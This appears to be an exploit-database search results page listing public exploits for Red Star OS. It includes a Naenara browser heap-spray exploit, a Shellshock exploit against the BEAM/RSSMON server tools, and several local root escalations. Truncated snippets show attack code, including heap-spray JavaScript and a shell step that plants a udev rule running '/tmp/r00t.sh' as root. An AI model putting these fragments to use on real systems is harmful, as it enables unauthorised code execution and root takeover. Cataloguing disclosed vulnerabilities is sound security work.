17 matches found
redstarinnovations.com XSS vulnerability
Open Bug Bounty ID: OBB-622896 Description| Value ---|--- Affected Website:| redstarinnovations.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...
Naenara Browser 3.5 (RedStar 3.0 Desktop) - JACKRABBIT Client-Side Command Execution Exploit
Exploit for linux platform in category local exploits n0m3rcYn0M3rCyn0m3Rc N0MeRCYn0m3rCyn0m3rCyn0m n0MERCypDK var xunescape = unescape; oneblock = xunescape"%u0040%u1000"; stackpivot =...
RedStar 3.0 Server - BEAM & RSSMON Command Execution (Shellshock) Exploit
Exploit for linux platform in category local exploits !/usr/bin/env python RedStar OS 3.0 Server BEAM & RSSMON shellshock exploit ======================================================== BEAM & RSSMON are Webmin based configuration utilities that ship with RSS server 3.0. These packages are the...
RSSMON / BEAM (Red Star OS 3.0) Shellshock
!/usr/bin/env python RedStar OS 3.0 Server BEAM & RSSMON shellshock exploit ======================================================== BEAM & RSSMON are Webmin based configuration utilities that ship with RSS server 3.0. These packages are the recommended GUI configuration components and listen on ...
Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution
n0m3rcYn0M3rCyn0m3Rc N0MeRCYn0m3rCyn0m3rCyn0m n0MERCypDK var xunescape = unescape; oneblock = xunescape"%u0040%u1000"; stackpivot = xunescape"%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141"; nopsled =...
Naenara Browser 3.5 (RedStar 3.0 Desktop) - JACKRABBIT Client-Side Command Execution
Naenara Browser 3.5 RedStar 3.0 Desktop - JACKRABBIT Client-Side Command Execution n0m3rcYn0M3rCyn0m3Rc N0MeRCYn0m3rCyn0m3rCyn0m n0MERCypDK var xunescape = unescape; oneblock = xunescape"%u0040%u1000"; stackpivot =...
RedStar 3.0 Server - Shellshock BEAM RSSMON Command Injection
RedStar 3.0 Server - Shellshock BEAM RSSMON Command Injection !/usr/bin/env python RedStar OS 3.0 Server BEAM & RSSMON shellshock exploit ======================================================== BEAM & RSSMON are Webmin based configuration utilities that ship with RSS server 3.0. These packages a...
RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection
!/usr/bin/env python RedStar OS 3.0 Server BEAM & RSSMON shellshock exploit ======================================================== BEAM & RSSMON are Webmin based configuration utilities that ship with RSS server 3.0. These packages are the recommended GUI configuration components and listen on ...
RedStar-3.0-Desktop-SUDO
Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png...
RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app) Vulnerability
Exploit for linux platform in category local exploits The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. UnFortunately, they left a big security hole: the Software Manager swmng.app, which runs as root through sudo and will install any RPM package, even i...
RedStar 3.0 Desktop - Privilege Escalation (Enable sudo) Vulnerability
Exploit for linux platform in category local exploits !/bin/bash -e Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak echo...
RedStar 3.0 Desktop - Enable sudo Privilege Escalation
RedStar 3.0 Desktop - Enable sudo Privilege Escalation !/bin/bash -e Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak echo...
RedStar 3.0 Desktop - Enable sudo Privilege Escalation
!/bin/bash -e Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak echo 'RUN+="/bin/bash /tmp/r00t.sh"'...
RedStar 3.0 Desktop - 'Software Manager swmng.app' Local Privilege Escalation
The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. UnFortunately, they left a big security hole: the Software Manager swmng.app, which runs as root through sudo and will install any RPM package, even if unsigned. To get root, get this RPM package I made...
RedStar 2.0 Desktop - 'World-writeable rc.sysinit' Local Privilege Escalation
Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit" which can be abused to execute commands on boot. An example exploitation of this vulnerability is shown here https://github.com/HackerFantastic/Public/blob/master/exploits/redstar2.0-localroot.png PoC: /bin/echo...
RedStar 2.0 Desktop - World-writeable rc.sysinit Local Privilege Escalation
RedStar 2.0 Desktop - World-writeable rc.sysinit Local Privilege Escalation Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit" which can be abused to execute commands on boot. An example exploitation of this vulnerability is shown here...
RedStar 3.0 Desktop - Software Manager swmng.app Local Privilege Escalation
RedStar 3.0 Desktop - Software Manager swmng.app Local Privilege Escalation The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. UnFortunately, they left a big security hole: the Software Manager swmng.app, which runs as root through sudo and will install a...